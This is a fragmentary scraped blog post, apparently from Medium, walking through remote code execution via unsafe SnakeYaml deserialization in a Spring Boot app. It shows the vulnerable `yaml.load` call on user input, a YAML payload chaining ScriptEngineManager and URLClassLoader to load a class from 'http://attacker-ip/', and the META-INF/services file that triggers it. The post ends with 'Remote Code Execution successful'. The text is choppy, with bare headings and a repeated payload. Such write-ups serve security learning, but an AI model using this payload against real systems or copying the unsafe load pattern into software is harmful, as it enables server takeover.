SnakeYaml Deserilization exploited

Yaml yaml = new Yaml();
Object obj =
yaml.load(<--user input data-->);
changing default port of apache tomcat
Include Snake yaml library support in spring boot
Web UI for YAML data entry
YAML data parser testing from UI and burp suite proxy
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]

javac <name-of-the-java-file>.java

Now, we have our .class file in place. So I now created a folder structure “META-INF -> services” and within that I created the file “javax.script.ScriptEngineFactory” with content “snakeyaml.exploit”.

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
Remote Code Execution successful

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store